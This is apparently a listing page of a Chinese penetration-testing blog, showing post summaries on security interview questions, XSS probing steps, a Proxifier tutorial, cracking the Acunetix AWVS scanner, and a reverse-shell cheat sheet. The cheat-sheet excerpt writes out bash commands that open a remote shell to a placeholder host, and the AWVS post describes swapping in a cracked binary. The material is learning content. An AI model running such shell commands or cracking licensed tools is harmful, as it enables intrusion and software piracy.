论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理
上一页 1 ··· 12 13 14 15 16 17 18 19 20 ··· 22 下一页

2020年5月8日

摘要: 工具链接请见文末,本站所提供工具仅供技术学习交流、请勿用于非法行为、否则后果自负。 文件上传至kali,增加权限如下: awvs账户信息设置如下: 修改破解文件:root@yangsir:~/awvs_linux_13# cp wvsc /home/acunetix/.acunetix/v_2002 阅读全文
posted @ 2020-05-08 10:57 Yangsir34 阅读(458) 评论(0) 推荐(0) 编辑

2020年5月6日

摘要: 详细脑图,包含日常各种所需。 阅读全文
posted @ 2020-05-06 22:52 Yangsir34 阅读(176) 评论(0) 推荐(0) 编辑

摘要: 预览: 链接: https://yang34.lanzous.com/icc1xeh 阅读全文
posted @ 2020-05-06 22:44 Yangsir34 阅读(221) 评论(0) 推荐(0) 编辑

2020年5月3日

摘要: 文末有网盘链接! 互联网行业: P2P金融行业: 电商行业: 政务行业: 常规漏洞: EXCEL网盘链接:https://ww.lanzous.com/ic8ddvc 更多分享:https://www.cnblogs.com/Yang34/p/12375242.html 阅读全文
posted @ 2020-05-03 23:57 Yangsir34 阅读(340) 评论(0) 推荐(0) 编辑

2020年4月30日

摘要: * [HR面](#hr面) * [问题](#问题) * [对我们公司有什么了解,为什么选择本公司](#对我们公司有什么了解为什么选择本公司) * [为什么想要应聘这个职位](#为什么想要应聘这个职位) * [对安全服务是怎么理解的](#对安全服务是怎么理解的) * [如果我不知道渗透测试,两分钟说一 阅读全文
posted @ 2020-04-30 10:27 Yangsir34 阅读(499) 评论(0) 推荐(0) 编辑

摘要: Bash TCP: Victim:bash -i >& /dev/tcp/1.1.1.1/6666 0>&1 /bin/bash -i > /dev/tcp/1.1.1.1/6666 0<& 2>&1 exec 5<>/dev/tcp/1.1.1.1/6666;cat <&5 | while rea 阅读全文
posted @ 2020-04-30 09:43 Yangsir34 阅读(417) 评论(0) 推荐(0) 编辑

2020年4月23日

摘要: 仅作技术交流,仅供学习使用,请遵守网络安全法,用于非法目的与本人无关。 简介 很多的代理软件可能是通过IE代理来支持流量的转发的,而这里将普及一种同时让电脑上不支持代理访问的软件使用技术,这就晓得一款神器Proxifier。 Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过 阅读全文
posted @ 2020-04-23 19:49 Yangsir34 阅读(3662) 评论(0) 推荐(0) 编辑

2020年4月22日

摘要: 详细脑图,包含日常各种所需。 阅读全文
posted @ 2020-04-22 21:54 Yangsir34 阅读(217) 评论(0) 推荐(0) 编辑

摘要: 1)尝试插入比较正常的HTML标签,例如:<b>,<i>,<u>来看一下返回页面的情况是怎样的,是否被HTML编码了,或者标签被过滤了。 2)尝试插入不闭合的标签,例如:<b,<i,<u,<marquee然后看一下返回响应,是否对开放的标签也有过滤。 3)然后测试几个XSS的payload,基本所有 阅读全文
posted @ 2020-04-22 21:25 Yangsir34 阅读(1464) 评论(0) 推荐(0) 编辑

摘要: * [面试问题记录](#面试问题记录) * [360](#360) * [SQL的存储引擎](#sql的存储引擎) * [SQL注入写shell的条件,用法](#sql注入写shell的条件用法) * [GPC是什么?开启了怎么绕过](#gpc是什么开启了怎么绕过) * [Mysql一个@和两个@什 阅读全文
posted @ 2020-04-22 15:02 Yangsir34 阅读(800) 评论(0) 推荐(0) 编辑

上一页 1 ··· 12 13 14 15 16 17 18 19 20 ··· 22 下一页